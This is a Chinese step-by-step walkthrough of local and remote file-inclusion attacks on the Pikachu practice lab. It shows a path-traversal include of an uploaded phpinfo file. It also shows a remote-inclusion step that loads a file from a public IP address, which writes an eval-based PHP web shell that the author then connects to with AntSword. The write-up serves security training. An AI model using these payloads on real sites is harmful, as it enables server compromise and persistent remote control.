pikachu文件包含漏洞靶场攻略

一、File inclusion(local)(本地文件包含)

1.打开pikachu的本机包含文件靶场

2.随意提交查询

可以看到是get传参 可以在filename参数进行文件包含

3.准备好一个jpg文件

<?php phpinfo(); ?>将内容写到1.jpg中

点击上传文件 上传1.jpg

文件上传成功

4.filename后面输入../../../../1.php访问php文件

二、File Inclusion(remote)(远程文件包含)

一,修改配置

allow_url_fopen=on //默认打开

Allow_url_include=on //默认关闭

二,随意提交查询

三,宝塔公网上创建一个6.txt文件,

里面输入<?php fputs(fopen("1.php","w"),'<?php eval($_POST["cmd"]);?>')?>

四,filename后面输入http://47.121.212.101/6.txt

五,fileinclude目录下找到php文件

六,访问php文件,蚁剑连接

相关推荐
德迅云安全-小潘1 小时前
H5安全风险与防护策略:构建可信的移动互联网服务
web安全
PXM的算法星球1 小时前
并发安全的轮询下标设计:用取模消灭越界与状态依赖
安全
优选资源分享1 小时前
PDF Anti-Copy Pro v2.6.2.4:PDF 防拷贝工具
网络·安全·pdf
三块可乐两块冰2 小时前
【无标题】
安全
边际效应2 小时前
第十三章:Native层安全深度剖析
安全
边际效应3 小时前
第四章:Unidbg原理与环境搭建
安全
yintele3 小时前
类人机器人BMS的静电防护
网络·安全·机器人
●VON3 小时前
AI 保险机制:为智能时代的不确定性兜底
人工智能·学习·安全·制造·von
bleach-3 小时前
buuctf系列解题思路祥讲--[SUCTF 2019]CheckIn1--文件上传以及user.ini的应用
nginx·web安全·网络安全·php
Bruce_Liuxiaowei3 小时前
内网探测常用技术方法整理
网络·安全·网络安全